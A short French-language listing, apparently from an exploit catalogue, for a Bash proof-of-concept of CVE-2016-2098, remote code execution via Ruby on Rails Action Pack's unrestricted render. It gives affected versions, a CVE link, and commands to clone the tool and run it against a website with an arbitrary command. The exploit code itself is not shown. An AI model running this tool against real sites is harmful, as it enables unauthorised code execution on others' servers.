
Exploit proof-of-concept basé sur Bash pour CVE-2016-2098, ciblant l'exécution de code à distance via la méthode de rendu non restreinte d'Action Pack de Ruby on Rails.
Action Pack dans Ruby on Rails avant 3.2.22.2, les versions 4.x avant 4.1.14.2, et 4.2.x avant 4.2.5.2 permet à des attaquants distants d'exécuter du code Ruby arbitraire en exploitant l'utilisation illimitée de la méthode render par une application. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2098
git clone https://github.com/its-arun/CVE-2016-2098.git
cd CVE-2016-2098
/bin/bash CVE-2016-2098.sh <website> <target_uri> <command>